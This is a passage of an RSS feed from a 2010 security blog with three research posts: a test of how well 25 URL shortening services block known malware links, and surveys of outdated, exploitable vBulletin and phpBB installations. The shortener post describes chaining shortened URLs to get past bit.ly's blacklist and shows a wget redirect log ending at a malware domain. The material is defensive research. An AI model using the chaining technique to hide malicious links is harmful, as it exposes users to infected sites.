			<content:encoded><![CDATA[<p>URL shortening services have become all the rage on the Internet. These services take a long URL as input and produce a short, easy to use, URL as an output. Simple! By virtue of their ease of use, millions of Internet surfers use them to post messages on <a href="http://twitter.com/bitly" target="_blank">twitter</a>. In fact, URL Shortening services like <a href="http://twitter.com/bitly" target="_blank">bit.ly</a> have garnered so much attention that even giants like <a href="http://www.google.com" target="_blank">Google</a> and <a href="http://www.microsoft.com" target="_blank">Microsoft</a> have jumped onto the URL shortening bandwagon.</p>
<p><strong>Case in point: </strong></p>
<ul>
<li>Google: <a href="http://bits.blogs.nytimes.com/2009/12/14/googl-challenges-bitly-as-king-of-the-short/" target="_blank">goo.gl</a></li>
<li>Microsoft: <a href="http://www.techcrunch.com/2010/01/15/bing-url-shortener/" target="_blank">binged.it</a></li>
</ul>
<p>These URL shortening services are godsend for Internet surfers tired of copying and pasting long, ugly looking, URLs. But hold on a minute! All is not hunky dory in URL Shortening Land.</p>
<p>Due to processes inherent to &#8220;URL Shortening,&#8221; the original URL an Internet surfer might like to shorten is, for all purposes, being obfuscated. Is this a problem? Yes. Why, you ask? Consider the fact that people, not even necessarily tech-savvy ones, have learned to double check the links present in their emails and on websites. They even have help from various browser plugins, but in general, <a href="http://www.technewsworld.com/story/44507.html" target="_blank">users are smartening up</a>. When these same people see &#8220;shortened&#8221; links, they have no way to make a judgment call on whether visiting the link is safe, or not. For example, you may recognize <a href="http://www.stopthehacker.com" target="_blank">www.stopthehacker.com</a> as being a benign, safe to visit link, but what about <a href="http://bit.ly/oJMrP" target="_blank">bit.ly/oJMrP</a> or <a href="http://bit.ly/dc38ze" target="_blank">bit.ly/dc38ze</a>?</p>
<p>Articles published from credible sources, like <a href="http://isc.sans.org/diary.html?storyid=6589" target="_blank">ISC SANS</a>, show that URL shortening services, when compromised, can provide an excellent mechanism for malicious hackers to infect unsuspecting visitors. Criminals <a href="http://readerszone.com/google/cyber-criminals-using-url-shortening-services-to-by-pass-google-safe-browsing.html" target="_blank">use these services to bypass</a> Google&#8217;s Safe Browsing service, which is used by popular browsers.</p>
<p>To combat this growing menace, <a href="http://www.theregister.co.uk/2009/12/01/shorturl_security/" target="_blank">URL shortening services have partnered with security companies</a> to identify malicious URLs and websites. Some of them even use the <a href="http://www.surbl.org/" target="_blank">SURBL</a> blacklists to identify if someone has tried to link to a malicious website.</p>
<p>This article attempts to identify the effectiveness of security measures put in place by the various URL shortening services.</p>
<p><strong>This experiment answers the following questions:</strong></p>
<ul>
<li>Do URL shortening services have any kind of security measures in place?</li>
<li>How effective are these security measures?</li>
</ul>
<p><strong>The 25 URL shortening services evaluated in this article are listed below:</strong></p>
<p>We compare 25 URL shortening services listed below. Each URL shortening service is analyzed to measure the effectiveness of their security measures. We use a two stage process to evaluate the security implemented by each service.</p>
<pre class="brush: plain;">
snipr.com
budurl.com
bit.ly
short.to
twurl.nl
chilp.it
fon.gs
ub0.cc
snurl.com
fwd4.me
short.ie
a.gd
hurl.ws
kl.am
to.ly
hex.io
tr.im
cli.gs
urlborg.com
is.gd
sn.im
ur1.ca
tweetburner.com
tinyurl.com
snipurl.com
</pre>
<p><strong>Experiment methodology:</strong></p>
<p>An initial corpus of 932 websites was obtained from <a href="http://www.malware.com.br" target="_blank">Malware Patrol</a> a well respected source of information about malware infected websites, which receives nearly 3,500,000 hits/month. This experiment was conducted between February 2nd and February 4th, 2010.</p>
<p>For each URL obtained from <a href="http://www.malware.com.br/" target="_blank">Malware Patrol</a>, we attempt to create shortened URLs for each site domain and full URL using each of the 25 services.</p>
<p>We denote a service as <strong>Stage 1 Compliant</strong> if it appears to use a security service or blacklist to identify malicious domains and does not allow a user to create a shortened link to any infected domain. Does the URL shortening service allow a user to create a URL pointing to a malicious domain (e.g. http://www.badsite.dom)?</p>
<p>We denote a service as <strong>Stage 2 Compliant</strong> if it uses a security service or blacklist to identify malicious domains and does not allow a user to create a shortened link to any infected domain or malicious full URL hosted on that domain. Does the URL shortening service allow a user to create a URL pointing to  a malicious link hosted on a malicious domain (e.g. http://www.badsite.dom/badfolder/badfile)?</p>
<p><strong>We present the most interesting results in brief:</strong></p>
<ul>
<li>Approximately 68% of URL shortening services were <strong>Stage 1 Compliant</strong>.</li>
<li>Approximately 56% of URL shortening services were <em>exclusively</em> <strong>Stage 2 Compliant</strong>.</li>
<li>Approximately 52% of URL shortening services were <em>both</em> <strong>Stage 1 Compliant</strong> and <strong>Stage 2 Compliant</strong> (see graph below).</li>
</ul>
<p><strong>Observations on specific URL shortening services:</strong></p>
<ul>
<li>bit.ly seems to favor blocking malicious domains rather than specific links.</li>
<li>fwd4.me, hurl.ws and urlborg.com seem to favor blocking malicious links rather than specific domains.</li>
<li>bit.ly failed to qualify as <strong>Stage 2 Compliant</strong> due to 0.5% of tested URLs.</li>
<li>fwd4.me failed to qualify as <strong>Stage 1 Compliant</strong> due to 9.8% of tested URLs.</li>
<li>hurl.ws failed to qualify as <strong>Stage 1 Compliant</strong> due to 0.3% of tested URLs.</li>
<li>urlborg.com failed to qualify as <strong>Stage 1 Compliant</strong> due to 0.3% of tested URLs.</li>
</ul>
<div id="attachment_1400" class="wp-caption aligncenter" style="width: 310px"><img src="http://www.stopthehacker.com/wp-content/uploads/2010/02/Venn-300x192.png" alt="" title="Venn Diagram depicting URL filtering capabilities of URL shortening services. Only about half of the most popular URL shortening services are effective at blocking malicious URLs." width="300" height="192" class="size-medium wp-image-1400" /><p class="wp-caption-text">Venn Diagram depicting URL filtering capabilities of URL shortening services. Only about half of the most popular URL shortening services are effective at blocking malicious URLs.</p></div>
<p><strong>Stage 1 Compliant and Stage 2 Compliant services:</strong></p>
<pre class="brush: plain;">
budurl.com
cli.gs
fon.gs
hex.io
is.gd
kl.am
sn.im
snipr.com
snipurl.com
snurl.com
to.ly
tr.im
ub0.cc
</pre>
<p><strong>Deeper security issues remain:</strong></p>
<p>It seems that popular services like bit.ly, which do try to use blacklists in order to prevent malicious hackers from using their services and pointing to bad websites, can still be easily fooled by chaining together shortened URLs created by another service. We have found that if a malicious user can create a shortened URL using a service that does not implement blacklist checks or is not effective, then a service like bit.ly can be tricked into redirecting the visitor via the malicious shortened URL to a malicious domain. Effectively, users can be redirected to a malicious site regardless of bit.ly performing all its checks. See the appendix for an example below (wget log).</p>
<p><strong>Conclusion:</strong></p>
<p>This limited experiment shows that URL shortening services have a long way to go before Internet users can trust them to deliver safe links. About half of the most popular URL shortening services seem to be somewhat effective at blocking access to well known malicious URLs that can be found on blacklists. It remains to be seen if these URL shortening services can improve and provide a safer web experience for their users.</p>
<p><span id="more-1130"></span></p>
<h2>Appendix</h2>
<p><strong>Wget log example:</strong></p>
<p>In this example, a malicious link (hxxp://wywg.ccsfyb.cn/wywg/txer) has been shortened using ow.ly (hxxp://ow.ly/Zyv3). Then, this shortened URL is fed to bit.ly. The shortened bit.ly URL (hxxp://bit.ly/5s4YhP) is created successfully and blacklist checks are no longer effective.</p>
<pre class="brush: plain;">
$ wget -O demonstrate_bit.ly_exploit http://bit.ly/5s4YhP
--scrubbed--  http://bit.ly/5s4YhP
Resolving bit.ly... 168.143.174.29, 128.121.234.46, 128.121.254.129, ...
Connecting to bit.ly|168.143.174.29|:80... connected.
HTTP request sent, awaiting response... 301 Moved
Location: http://ow.ly/Zyv3 [following]
---scrubbed--  http://ow.ly/Zyv3
Resolving ow.ly... 75.101.155.42
Connecting to ow.ly|75.101.155.42|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://wywg.ccsfyb.cn/wywg/txer [following]
---scrubbed--  http://wywg.ccsfyb.cn/wywg/txer
Resolving wywg.ccsfyb.cn... 98.126.11.178
Connecting to wywg.ccsfyb.cn|98.126.11.178|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://wywg.ccsfyb.cn/wywg/txer/ [following]
---scrubbed--  http://wywg.ccsfyb.cn/wywg/txer/
Reusing existing connection to wywg.ccsfyb.cn:80.
HTTP request sent, awaiting response... 403 Forbidden
-scrubbed-- ERROR 403: Forbidden.
</pre>
]]></content:encoded>
			<wfw:commentRss>http://www.stopthehacker.com/2010/02/19/analyzing-url-shorteners/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Analyzing Popular CMSs: Are vBulletin Users at Risk?</title>
		<link>http://www.stopthehacker.com/2010/02/08/analyzing-popular-cmss-are-vbulletin-users-at-risk/</link>
		<comments>http://www.stopthehacker.com/2010/02/08/analyzing-popular-cmss-are-vbulletin-users-at-risk/#comments</comments>
		<pubDate>Mon, 08 Feb 2010 21:20:50 +0000</pubDate>
		<dc:creator>anirban</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[Report]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[CMS]]></category>
		<category><![CDATA[safety]]></category>
		<category><![CDATA[vbulletin]]></category>

		<guid isPermaLink="false">http://www.stopthehacker.com/?p=1288</guid>
		<description><![CDATA[This article is the last in our series of articles on CMS analysis, this time we will be focusing on vBulletin. We have previously profiled Joomla, WordPress, Drupal and phpBB.
vBulletin is a little bit different than the list of CMSes we have been analyzing in this series. The first and most apparent being that it is [...]]]></description>
			<content:encoded><![CDATA[<p>This article is the last in our series of articles on CMS analysis, this time we will be focusing on <a href="http://www.vbulletin.com" target="_blank">vBulletin</a>. We have previously profiled <a href="http://www.stopthehacker.com/2010/02/01/analyzing-popular-cmses-sites-using-joomla/" target="_blank">Joomla</a>, <a href="http://www.stopthehacker.com/2010/02/02/analyzing-popular-cmses-are-wordpress-users-at-risk/" target="_blank">WordPress</a>, <a href="../2010/02/03/analyzing-popular-cmss-are-drupal-users-at-risk/" target="_blank">Drupal</a> and <a href="http://www.stopthehacker.com/2010/02/04/analyzing-popular-cmss-are-phpbb-users-at-risk/" target="_blank">phpBB</a>.</p>
<p><a href="http://www.vbulletin.com/" target="_blank">vBulletin</a> is a little bit different than the list of CMSes we have been analyzing in this series. The first and most apparent being that it is not a free piece of software. The <a href="http://www.vbulletin.com/" target="_blank">vBulletin</a> site displays a cost of $195-$285 for a new license. The obvious question then, is why do people pay for this CMS when there are other good CMSs available for free? The answer lies in the varied list of features, such as a built-in photo album, event management and many other interesting and helpful features. Add to this good support, compatibility with existing software, many themes, built-in integration for payment engines and advertisement support&#8230; it&#8217;s not hard to see why <a href="http://www.vbulletin.com/" target="_blank">vBulletin</a> has acquired a large fan base.</p>
<p>Next, we will take a closer look at <a href="http://www.vbulletin.com/" target="_blank">vBulletin</a> to understand security issues facing active installations seen publicly on the Internet.</p>
<p><strong>The aim of this experiment:</strong></p>
<ul>
<li>To determine the number of <a href="http://www.vbulletin.com/" target="_blank">vBulletin</a> sites using older versions of the CMS package (and hence vulnerable to attacks).</li>
<li>To identify the associated scripts <a href="http://www.vbulletin.com/" target="_blank">vBulletin</a> that users install in addition to core <a href="http://www.vbulletin.com/" target="_blank">vBulletin</a> functionality.</li>
<li>Identify the vulnerabilities of using the associated scripts.</li>
</ul>
<p><strong>Experiment methodology:</strong></p>
<p>An initial corpus of 100,000 websites was mined (via <a href="http://www.google.com" target="_blank">Google</a>) using a keyword search to locate websites which discussed <a href="http://www.vbulletin.com/" target="_blank">vBulletin</a>. Understandably, not all 100,000 websites would actually be using <a href="http://www.vbulletin.com/" target="_blank">vBulletin</a>. Approximately 10,000 websites from this corpus were analyzed. Each website was analyzed to determine if it was generated by <a href="http://www.vbulletin.com/" target="_blank">vBulletin</a> or its associated plugins. Each website was then cross-referenced with the <a href="http://www.google.com/tools/firefox/safebrowsing/" target="_blank">Google Safe Browsing List</a>. This experiment was conducted between February 5th and February 8th, 2010.</p>
<p><strong>Distribution of vBulletin versions:</strong></p>
<p>In 93.09% of sites running on <a href="http://www.vbulletin.com/" target="_blank">vBulletin</a> the version number could be identified. We found the following distribution of <a href="http://www.vbulletin.com/" target="_blank">vBulletin</a> versions in the websites examined (where versions of installations could be determined). A more detailed breakdown of the distribution of vBulletin versions can be seen at the end of this article.</p>
<div id="attachment_1302" class="wp-caption aligncenter" style="width: 297px"><img class="size-full wp-image-1302" title="Significant numbers of older vBulletin installations are present on the Internet." src="http://www.stopthehacker.com/wp-content/uploads/2010/02/vbulletin_versions.jpeg" alt="Significant numbers of older vBulletin installations are present on the Internet." width="287" height="238" /><p class="wp-caption-text">Significant numbers of older vBulletin installations are present on the Internet.</p></div>
<p><em>Note: <a href="http://www.vbulletin.com/forum/showthread.php?221905-vBulletin-3.6.5-Released" target="_blank">Publicly available information about exploits for vBulletin 3.x.x and earlier versions exist</a>. <a href="http://www.waraxe.us/ftopict-2482.html" target="_blank">[1]</a> <a href="http://forum.intern0t.net/exploits-vulnerabilities-pocs/1502-vbulletin-3-8-4-cross-site-script-redirection.html" target="_blank">[2]</a></em></p>
<p><strong>We present the most interesting results here:</strong></p>
<ul>
<li>Nearly 95% (see graph above) of <a href="http://www.vbulletin.com/" target="_blank">vBulletin</a> sites are running older versions for which exploits are available.</li>
<li>None of the <a href="http://www.vbulletin.com/" target="_blank">vBulletin</a> sites were blacklisted by <a href="http://www.google.com/tools/firefox/safebrowsing/" target="_blank">Google Safe Browsing</a>.</li>
<li>Only 13.5% of <a href="http://www.vbulletin.com/" target="_blank">vBulletin</a> sites had Iframes embedded in them. None of the Iframes were obfuscated or tried to load malware. All Iframes found loaded ads.</li>
<li> 10.2% of the <a href="http://www.vbulletin.com/" target="_blank">vBulletin</a> sites which had Iframes were using JQuery.<br />
<em> Note: <a href="../2009/12/09/when-benign-scripts-attack-v/" target="_blank">JQuery has been known to be targeted by malicious hackers as a code-injection delivery mechanism</a>.</em></li>
<li>Only 0.1% of the <a href="http://www.vbulletin.com/" target="_blank">vBulletin</a> sites use Mootools</li>
<li>None of the <a href="http://www.vbulletin.com/" target="_blank">vBulletin</a> sites use AC_RunActiveContent.js.</li>
</ul>
<p><strong>Conclusion:</strong></p>
<p>This limited experiment shows that like <a href="../2010/02/02/analyzing-popular-cmses-are-wordpress-users-at-risk/" target="_blank">WordPress, </a> <a href="http://www.vbulletin.com/" target="_blank">vBulletin</a> also suffers from a large number of vulnerable installations being available on the Internet. It is intriguing to see that a CMS system, which is not free, and is tightly controlled is not kept up to date across the board. Consider the case of <a href="../2010/02/03/analyzing-popular-cmss-are-drupal-users-at-risk/" target="_blank">Drupal</a>, where we observed that the variety in the versions of various installations is very low. The natural question at this point is: why is a free CMS system like Drupal doing better, security-wise, than a commercial CMS system like <a href="http://www.vbulletin.com/" target="_blank">vBulletin</a>? Why are most Drupal installations up to date. One thing to note though is that like <a href="../2010/02/03/analyzing-popular-cmss-are-drupal-users-at-risk/" target="_blank">Drupal</a> and <a href="http://www.phpbb.com/" target="_blank">phpBB</a>, <a href="http://www.vbulletin.com/" target="_blank">vBulletin</a> installations also seem to be relatively safe from the most prevalent malware. Most Iframes on <a href="http://www.vbulletin.com/" target="_blank">vBulletin</a> sites are Ads, a likely revenue stream for most forum admins.</p>
<p>The fact remains that there many vulnerable installations of <a href="http://www.vbulletin.com/" target="_blank">vBulletin</a> which can fall prey to malicious hackers.</p>
<p>Till next time.<br />
<span id="more-1288"></span><br />
<strong>See below for detailed breakdown of the distribution of vBulletin versions:</strong></p>
<ul>
<li>0.89% of sites were running version 3.0.13</li>
<li>0.29% of sites were running version 3.0.14</li>
<li>0.29% of sites were running version 3.0.3</li>
<li>0.29% of sites were running version 3.0.5</li>
<li>0.29% of sites were running version 3.0.7</li>
<li>1.18% of sites were running version 3.5.2</li>
<li>2.67% of sites were running version 3.5.4</li>
<li>0.29% of sites were running version 3.6.1</li>
<li>1.18% of sites were running version 3.6.10</li>
<li>0.59% of sites were running version 3.6.12</li>
<li>1.18% of sites were running version 3.6.2</li>
<li>4.45% of sites were running version 3.6.4</li>
<li>0.29% of sites were running version 3.6.6</li>
<li>1.48% of sites were running version 3.6.7</li>
<li>4.74% of sites were running version 3.6.8</li>
<li>0.29% of sites were running version 3.6.9</li>
<li>2.96% of sites were running version 3.7.0</li>
<li>2.37% of sites were running version 3.7.1</li>
<li>1.78% of sites were running version 3.7.2</li>
<li>4.74% of sites were running version 3.7.3</li>
<li>2.37% of sites were running version 3.7.4</li>
<li>1.18% of sites were running version 3.7.5</li>
<li>2.96% of sites were running version 3.7.6</li>
<li>1.48% of sites were running version 3.8.0</li>
<li>8.90% of sites were running version 3.8.1</li>
<li>10.3% of sites were running version 3.8.2</li>
<li>3.85% of sites were running version 3.8.3</li>
<li>31.7% of sites were running version 3.8.4</li>
<li>2.07% of sites were running version 4.0.0</li>
<li>2.07% of sites were running version 4.0.1</li>
<li>0.59% of sites were running version 4.0.2</li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.stopthehacker.com/2010/02/08/analyzing-popular-cmss-are-vbulletin-users-at-risk/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Analyzing Popular CMSs: Are phpBB Users at Risk?</title>
		<link>http://www.stopthehacker.com/2010/02/04/analyzing-popular-cmss-are-phpbb-users-at-risk/</link>
		<comments>http://www.stopthehacker.com/2010/02/04/analyzing-popular-cmss-are-phpbb-users-at-risk/#comments</comments>
		<pubDate>Thu, 04 Feb 2010 23:00:22 +0000</pubDate>
		<dc:creator>anirban</dc:creator>
				<category><![CDATA[Report]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[CMS]]></category>
		<category><![CDATA[phpbb]]></category>
		<category><![CDATA[safety]]></category>
		<category><![CDATA[website]]></category>

		<guid isPermaLink="false">http://www.stopthehacker.com/?p=1247</guid>
		<description><![CDATA[Continuing with our series of articles on CMS security, this time we will be focusing on phpBB. We have previously profiled Joomla, WordPress, and Drupal.
I can already hear CMS purists howling that phpBB is not a CMS. In a way they&#8217;re right, but in other ways it is a CMS.  phpBB is without a doubt one [...]]]></description>
			<content:encoded><![CDATA[<p>Continuing with our series of articles on CMS security, this time we will be focusing on <a href="http://www.phpbb.com" target="_blank">phpBB</a>. We have previously profiled <a href="http://www.stopthehacker.com/2010/02/01/analyzing-popular-cmses-sites-using-joomla/" target="_blank">Joomla</a>, <a href="http://www.stopthehacker.com/2010/02/02/analyzing-popular-cmses-are-wordpress-users-at-risk/" target="_blank">WordPress</a>, and <a href="../2010/02/03/analyzing-popular-cmss-are-drupal-users-at-risk/" target="_blank">Drupal</a>.</p>
<p>I can already hear CMS purists howling that <a href="http://www.phpbb.com/" target="_blank">phpBB</a> is not a CMS. In a way they&#8217;re right, but in other ways it is a CMS.  <a href="http://www.phpbb.com/" target="_blank">phpBB</a> is without a doubt one of the most popular &#8220;Internet Forum&#8221; software packages available. Its ease of installation, various custom skins, and large installation base make it a very attractive choice for anyone who wishes to set up a community discussion board on the Internet. <a href="http://www.phpbb.com/" target="_blank">phpBB</a> has had a few million downloads at the very least and enjoys a very active user group.</p>
<p><a href="http://www.phpbb.com/" target="_blank">phpBB</a> is popular among webmasters who want to set up Internet forums easily. Users of phpBB also benefit from a high level of customization. Another big plus for this CMS. Support for this CMS is awesome, in fact, phpBB has flash based <a href="http://phpbb.com/support/tutorials/3.0/?from=submenu&amp;sid=6828fb7af3281d796c059037c2bdd58b" target="_blank">video tutorials</a> to help new users get started! Additionally, the <a href="http://www.phpbb.com/" target="_blank">phpBB</a> developer community is very security conscious.</p>
<p>Next, we will take a close look at <a href="http://www.phpbb.com/" target="_blank">phpBB</a><a href="http://drupal.org/" target="_blank"></a> to understand security issues with active installations seen publicly on the Internet.</p>
<p><strong>The aim of this experiment:</strong></p>
<ul>
<li>To determine the number of <a href="http://www.phpbb.com/" target="_blank">phpBB</a> sites using older versions of the CMS package (and hence vulnerable to attacks).</li>
<li>Identify the associated scripts <a href="http://www.phpbb.com/" target="_blank">phpBB</a> users install in addition to core <a href="http://www.phpbb.com/" target="_blank">phpBB</a> functionality.</li>
<li>Identify the vulnerabilities of using the associated scripts.</li>
</ul>
<p><strong>Experiment methodology:</strong></p>
<p>An initial corpus of 100,000 websites was mined (via <a href="http://www.google.com" target="_blank">Google</a>) using a keyword search to locate websites which discussed <a href="http://www.phpbb.com/" target="_blank">phpBB</a>. Understandably, not all 100,000 websites would actually be using <a href="http://www.phpbb.com/" target="_blank">phpBB</a>. Approximately 10,000 websites from this corpus were analyzed. Each website was analyzed to determine if it was generated by <a href="http://www.phpbb.com/" target="_blank">phpBB</a> or its associated plugins. Each website was then cross-referenced with the <a href="http://www.google.com/tools/firefox/safebrowsing/" target="_blank">Google Safe Browsing List</a>. This experiment was conducted between February 1st and February 3rd, 2010.</p>
<p><strong>Distribution of phpBB versions:</strong></p>
<p>In 84.16% of sites running on <a href="http://www.phpbb.com/" target="_blank">phpBB </a> a version number of the CMS package could be identified. We found the following distribution of <a href="http://www.phpbb.com/" target="_blank">phpBB</a> versions in the websites examined (where versions of installations could be determined).</p>
<ul>
<li>32.2% of sites were running version 2.x<br /><em>Note: <a href="http://www.governmentsecurity.org/forum/index.php?showtopic=14081" target="_blank">Publicly available information about exploits for phpBB 2.x versions exist</a>.</em></li>
<li>67.8% of sites were running version 3.x</li>
</ul>
<p><strong>We present the most interesting results:</strong></p>
<ul>
<li>None of the <a href="http://www.phpbb.com/" target="_blank">phpBB</a> sites were blacklisted by <a href="http://www.google.com/tools/firefox/safebrowsing/" target="_blank">Google Safe Browsing</a>.</li>
<li>Only 2.5% of <a href="http://www.phpbb.com/" target="_blank">phpBB</a> sites had Iframes embedded in them. None of the Iframes were obfuscated or tried to load malware.</li>
<li> None of the <a href="http://www.phpbb.com/" target="_blank">phpBB</a> sites which had Iframes were using JQuery.<em><br />
</em></li>
<li>About 4.2% of all <a href="http://www.phpbb.com/" target="_blank">phpBB</a> sites use jQuery.<br /><em> Note: <a href="../2009/12/09/when-benign-scripts-attack-v/" target="_blank">JQuery has been known to be targeted by malicious hackers as a code-injection delivery mechanism</a>.</em></li>
<li>Only 0.3% of the <a href="http://www.phpbb.com/" target="_blank">phpBB</a> sites use Mootools.</li>
<li>Only 0.3% of the <a href="http://www.phpbb.com/" target="_blank">phpBB</a> sites use AC_RunActiveContent.js.</li>
</ul>
<p><strong>Conclusion:</strong></p>
<p>This limited experiment shows that like <a href="../2010/02/03/analyzing-popular-cmss-are-drupal-users-at-risk/" target="_blank">Drupal</a>, <a href="http://www.phpbb.com/" target="_blank">phpBB</a> installations seem to be relatively safe from the most prevalent forms of malware. However, the fact remains that there are quite a few vulnerable installations of <a href="http://www.phpbb.com/" target="_blank">phpBB</a> which can fall prey to malicious hackers. This trend is echoed by our analysis of <a href="../2010/02/02/analyzing-popular-cmses-are-wordpress-users-at-risk/" target="_blank">WordPress</a> . It will be interesting to probe further and understand why the number of &#8220;infected&#8221; sites is not higher when there are vulnerable installations in the wild.</p>
<p>Till next time.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.stopthehacker.com/2010/02/04/analyzing-popular-cmss-are-phpbb-users-at-risk/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

<!-- Dynamic page generated in 0.528 seconds. -->
<!-- Cached page generated by WP-Super-Cache on 2010-03-10 14:01:55 -->
<!-- Compression = gzip -->